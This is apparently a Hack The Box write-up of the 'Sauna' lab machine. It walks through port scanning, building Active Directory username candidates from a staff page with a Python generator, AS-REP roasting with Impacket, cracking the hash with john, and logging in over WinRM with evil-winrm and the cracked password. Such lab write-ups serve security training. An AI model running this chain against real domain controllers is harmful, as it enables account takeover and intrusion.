Initial Enumeration


Starting off with the usual HTB full-port nmap scan (-A for version detection, OS guessing and default scripts, -T4 timing, -Pn to skip host discovery, -p- for all 65535 TCP ports):

nmap -AT4 -Pn -p- -v -oN Sauna 10.10.10.175

We can see ports 80, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, and 5985 are open.


That is a lot of surface to enumerate, and the combination of Kerberos (88), LDAP (389, 636 and the global catalog on 3268/3269), SMB (139/445), kpasswd (464) and WinRM is the signature of a Windows domain controller. We start with the most accessible service, the website on port 80.

Browsing the site, the Our Team entry in the dropdown menu leads to a page listing the bank's employees:

The quote says: "...So many bank account managers but only one security manager, sounds about right!"

Collect every employee's first and last name in a list; we will use them to build candidate usernames.

LDAP on 389 (together with Kerberos on 88) tells us this is an Active Directory domain controller, so we put together a username wordlist from the employee names using the usual AD conventions: first.last, first initial plus surname, and the first three letters of each name.

first.last: fergus.smith, shaun.coins, hugo.bear, bowie.taylor, sophie.driver, steven.kerb

flast: fsmith, scoins, hbear, btaylor, sdriver, skerb

firlas: fersmi, shacoi, hugbea, bowtay, sopdri, steker
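The list above was built by hand. The script below is an added example, not code from the original writeup, that does the same expansion for any list of full names so the wordlist does not depend on typing each permutation. The six names are the ones taken from the target's Our Team page and the three default conventions are the ones used above; the two extra conventions ("first_last" and "lastf") are assumptions added here for environments that use them and are off by default. It also handles the cases a hand-built list tends to get wrong: middle names, accents, apostrophes and hyphens in names, and two employees colliding on the same short form.

```python
"""Build an Active Directory username wordlist from employee full names.

Added example for this writeup, not code from the original post. The six
names are the ones the writeup pulled from the target's "Our Team" page and
the three default conventions are the ones the writeup's list uses. The
extra conventions ("first_last", "lastf") are assumptions added here and are
not applied unless requested.
"""
import re
import unicodedata
from typing import Callable, Dict, Iterable, List, Optional, Sequence, Tuple

# Employee names taken from the writeup's team page.
EMPLOYEES = [
    "Fergus Smith",
    "Shaun Coins",
    "Hugo Bear",
    "Bowie Taylor",
    "Sophie Driver",
    "Steven Kerb",
]

# Each convention maps (first, last) -> candidate sAMAccountName.
CONVENTIONS: Dict[str, Callable[[str, str], str]] = {
    "first.last": lambda f, l: f"{f}.{l}",          # fergus.smith
    "flast":      lambda f, l: f"{f[0]}{l}",        # fsmith
    "firlas":     lambda f, l: f"{f[:3]}{l[:3]}",   # fersmi
    # Assumed extras, not used on the page; enable via the `conventions` argument.
    "first_last": lambda f, l: f"{f}_{l}",          # fergus_smith
    "lastf":      lambda f, l: f"{l}{f[0]}",        # smithf
}

DEFAULT_CONVENTIONS: Tuple[str, ...] = ("first.last", "flast", "firlas")


def _normalize(token: str) -> str:
    """Lower-case a name part and reduce it to a-z0-9.

    Accents are stripped (é -> e) and punctuation such as apostrophes or
    hyphens is dropped, so "O'Brien" becomes "obrien" and "Mary-Anne" "maryanne".
    """
    ascii_token = unicodedata.normalize("NFKD", token).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z0-9]", "", ascii_token.lower())


def split_name(full_name: str) -> Optional[Tuple[str, str]]:
    """Return (first, last) for a full name, or None if there is no surname.

    Middle names and initials are ignored: only the first and last tokens
    are used, which is how the common AD conventions behave.
    """
    parts = [_normalize(p) for p in full_name.split()]
    parts = [p for p in parts if p]          # drop tokens that normalized to nothing
    if len(parts) < 2:
        return None
    return parts[0], parts[-1]


def generate_usernames(
    names: Iterable[str],
    conventions: Sequence[str] = DEFAULT_CONVENTIONS,
) -> List[str]:
    """Expand full names into unique username candidates, preserving order."""
    seen = set()
    out: List[str] = []
    for name in names:
        split = split_name(name)
        if split is None:
            continue                          # single-word name: nothing to build
        first, last = split
        for conv in conventions:
            candidate = CONVENTIONS[conv](first, last)
            if candidate not in seen:         # two employees can collide on "flast"
                seen.add(candidate)
                out.append(candidate)
    return out


if __name__ == "__main__":
    # One candidate per line, ready to be saved and passed to a -usersfile style option.
    print("\n".join(generate_usernames(EMPLOYEES)))
```

Redirect the output to a file and feed that file to whatever user-enumeration or pre-auth check you run next; because duplicates are removed, each candidate costs exactly one request against the domain controller.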

 

With this list in hand we turn to one of my favorite tools, Impacket. Its GetNPUsers.py script asks the KDC (Kerberos on port 88, not LDAP) for an AS-REP on behalf of each candidate user. An account with the "Do not require Kerberos preauthentication" flag set gets a reply without proving it knows the password, and that reply is encrypted with a key derived from the account's password, so it can be cracked offline. This is AS-REP roasting, and as a side effect it also confirms which usernames exist, since the KDC answers differently for unknown principals.

image-1595089549530.png

One account, fsmith, has pre-authentication disabled and hands back an AS-REP hash. Note that this is not a stored password hash pulled out of the directory; it is an encrypted Kerberos message that john can attack with a wordlist.
Cracking it with john gives fsmith's password, and since the nmap scan showed WinRM listening we can log in with evil-winrm (it uses port 5985 by default; pass -S for HTTPS on 5986):

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

image-1595089755180.png

Success! We have a shell as fsmith and can read the user flag.